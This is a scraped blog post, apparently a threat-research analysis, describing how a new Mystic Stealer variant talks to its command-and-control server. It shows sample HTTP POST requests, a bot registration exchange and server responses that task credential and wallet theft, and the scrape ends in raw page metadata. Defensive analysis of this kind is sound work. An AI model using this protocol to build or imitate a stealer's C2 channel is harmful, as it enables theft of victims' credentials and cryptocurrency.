Post Content\u00a0\u00a0<\/p>\n

\u200b<\/p>\n

In the latest Mystic Stealer variant, all communications between the infected system and the C2 server are performed using HTTP POST requests. Unlike the previous variant that used RC4 to encrypt a custom binary TCP-based protocol, the latest variant does not implement any form of encryption. The data sent in the POST query is Base64 encoded, as shown below:<\/p>\n

\nPOST \/loghub\/master HTTP\/1.1
\nContent-Type: multipart\/form-data; boundary=<boundary>
\nContent-Length: NNN
\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
\nHost: X.X.X.X
\nConnection: Keep-Alive
\nCache-Control: no-cache
\n–<boundary>
\nContent-Disposition: form-data; name=”<name>”
\nBASE64(<data>)
\n–<boundary> <\/p>\n

The response data from the server is also encoded in Base64. The response starts with \u201cOKrn\u201d and is followed by any data returned by the C2 server for the specific query.<\/p>\n

\nHTTP\/1.1 200 OK
\nServer: nginx\/1.18.0 (Ubuntu)
\nDate: Thu, 11 Sep 2023 HH:MM:SS GMT
\nContent-Type: text\/html; charset=utf-8
\nContent-Length: NNN
\nConnection: keep-alive
\nX-Frame-Options: DENY
\nX-Content-Type-Options: nosniff
\nReferrer-Policy: same-origin
\nBASE64(OK <rest of data for the specific command, if necessary>)<\/strong><\/p>\n

Registration<\/h3>\n

The infected system (bot) starts communication with the C2 server by sending a POST request with data containing a variable named hwid<\/em>, which includes a Base64 encoded bot ID generated based on information from the victim\u2019s machine. A second variable with the name build<\/em> contains the botnet ID, a value that is hardcoded in the binary of the malware. Once the C2 receives these initial two packets, the bot is registered.<\/p>\n

\nPOST \/loghub\/master HTTP\/1.1
\nContent-Type: multipart\/form-data; boundary=<boundary>
\nContent-Length: NNN
\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
\nHost: X.X.X.X
\nConnection: Keep-Alive
\nCache-Control: no-cache
\n–<boundary>
\nContent-Disposition: form-data; name=”hwid”
\nBASE64(0123456789ABCDEF123456)<\/strong>
\n–<boundary>
\nContent-Disposition: form-data; name=”build”
\nBASE64(botnet_id)<\/strong>
\n–<boundary>–<\/p>\n

The C2 server generates and returns a session token (a 64 byte lowercase hexadecimal string) that will be used in subsequent packets, together with a set of binary flags that indicates which actions should be performed (take a screenshot, steal browser credentials, steal cryptocurrency wallets, etc).<\/p>\n

\nHTTP\/1.1 200 OK
\nServer: nginx\/1.18.0 (Ubuntu)
\nDate: Thu, 07 Sep 2023 HH:MM:SS GMT
\nContent-Type: text\/html; charset=utf-8
\nContent-Length: NNN
\nConnection: keep-alive
\nX-Frame-Options: DENY
\nX-Content-Type-Options: nosniff
\nReferrer-Policy: same-origin
\nBASE64(OK <token>1kpfopkelmapcoipemfendmdcghnegimn<\/strong><\/p>","protected":false},"excerpt":{"rendered":"

Post Content\u00a0\u00a0 \u200b In the latest Mystic Stealer variant, all […]<\/p>\n","protected":false},"author":0,"featured_media":1484,"comment_status":"","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-1483","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-zenith-zscaler"],"yoast_head":"\n